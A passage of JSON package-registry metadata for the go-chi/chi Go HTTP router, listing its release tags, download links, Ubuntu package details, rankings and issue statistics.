chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.071Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/golang-github-go-chi-chi?arch=source\u0026distro=ubuntu-22.04\u0026repository_url=https://launchpad.net/ubuntu/jammy","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/golang-github-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/golang-github-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/golang-github-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/golang-github-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/golang-github-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/golang-github-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/golang-github-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"ubuntu-22.04","url":"https://launchpad.net/ubuntu/jammy","ecosystem":"ubuntu","default":false,"packages_count":34289,"maintainers_count":0,"namespaces_count":4,"keywords_count":1498,"github":"ubuntu","metadata":{"codename":"jammy","funded_packages_count":559},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:46.486Z","updated_at":"2026-08-10T05:07:56.140Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/namespaces"}},{"id":13448192,"name":"golang-github-go-chi-chi","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/go-chi/chi","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/go-chi/chi","keywords_array":["universe/golang"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-08T15:14:03.083Z","latest_release_published_at":"2026-02-08T15:14:03.083Z","latest_release_number":"5.1.0-1","last_synced_at":"2026-03-08T15:43:48.381Z","created_at":"2026-02-08T15:14:01.357Z","updated_at":"2026-08-08T10:51:35.128Z","registry_url":"https://launchpad.net/ubuntu/+source/golang-github-go-chi-chi","install_command":"apt-get install golang-github-go-chi-chi","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"golang-github-go-chi-chi-dev","standards_version":"4.7.0","maintainer":"Debian Go Packaging Team \u003cteam+pkg-go@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-golang, golang-any","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6